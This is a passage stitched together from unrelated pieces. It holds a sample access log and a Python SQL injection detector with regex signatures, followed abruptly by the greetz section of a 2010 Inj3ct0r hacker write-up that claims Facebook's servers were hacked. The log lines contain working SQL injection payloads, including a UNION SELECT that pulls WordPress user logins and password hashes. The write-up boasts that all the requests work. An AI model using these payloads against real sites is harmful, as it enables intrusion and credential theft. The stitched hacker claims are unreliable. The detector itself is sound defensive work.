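203.0.113.5 - - [06/Apr/2010:22:41:10 +0000] "GET /tvshowchat/show.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [06/Apr/2010:22:41:12 +0000] "GET /tvshowchat/show.php?id=inj3ct0r HTTP/1.1" 200 2210
203.0.113.5 - - [06/Apr/2010:22:41:15 +0000] "GET /tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1 HTTP/1.1" 200 2310
203.0.113.5 - - [06/Apr/2010:22:41:20 +0000] "GET /tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1-- HTTP/1.1" 200 2400
198.51.100.7 - - [06/Apr/2010:22:42:01 +0000] "GET /tvshowchat/show.php?id=2 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Signatures taken from the shape of the page's queries; matched against the
# decoded query string, case-insensitively where keywords are involved.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "version_or_schema_probe": re.compile(
        r"\binformation_schema\b|@@version|\bversion\s*\(\s*\)", re.I),
    "column_concat": re.compile(r"\bconcat(?:_ws)?\s*\(", re.I),
    "comment_terminator": re.compile(r"--(?:\s|$)|/\*|#"),
}

def decode_fully(s, max_rounds=3):
    """Percent-decode until the text stops changing (bounded), so a payload
    hidden behind double encoding (%2528 -> %28 -> '(') is inspected decoded."""
    for _ in range(max_rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s

def inspect_line(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    decoded = decode_fully(parts.query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # A non-numeric value where the application expects an integer id is the
    # first probe the page shows (id=inj3ct0r); flag it even without SQL keywords.
    for key, values in parse_qs(decoded, keep_blank_values=True).items():
        if key == "id" and any(not v.strip().isdigit() for v in values):
            hits.append("non_numeric_id")
            break
    if not hits:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": parts.path,
            "status": int(m.group("status")), "hits": hits, "decoded_query": decoded}

def scan_log(text):
    """Run inspect_line over every line and keep the findings, in log order."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["time"], f["path"], ",".join(f["hits"]))
```

Note that a 200 status is returned for every probe in the sample, as it was on the page: the application answered the injected queries successfully, so status-code alerting alone would have seen nothing, and the content of the query string is what has to be inspected.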

goOd =] Nice Hacking old school xD

[0x04] [Conclusion]

There's no 100% security! Be safe my friends! Watch for vulnerabilities and update promptly! Watch for updates on Inj3ct0r.com (Inj3ct0r Exploit Database)

[0x05] [Greetz]

Greetz to all members of Inj3ct0r.com

Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]

Personally h4x0rz:

0x1D, Z0m!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton..

You are good hackers. Respect y0u!

Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you for pushing me to write this article and reporting the dependence! Personal Respect to you from Inj3ct0r Team!

At the time of publication, all requests work! Attached images : inj3ct0r.com/facebook.zip

We want to thank the following people for their contribution.

Do not forget to keep track of vulnerabilities on Inj3ct0r.com

GoOd luck Hackers! =]

# Inj3ct0r.com [2010-04-06]

http://foro.elhacker.net/hacking_basico/facebooks_servers_was_hacked_by_inj3ct0r_team_hack_of_the_year-t298374.0.html#ixzz1UeiTGLEP

If this is real, good work, guys...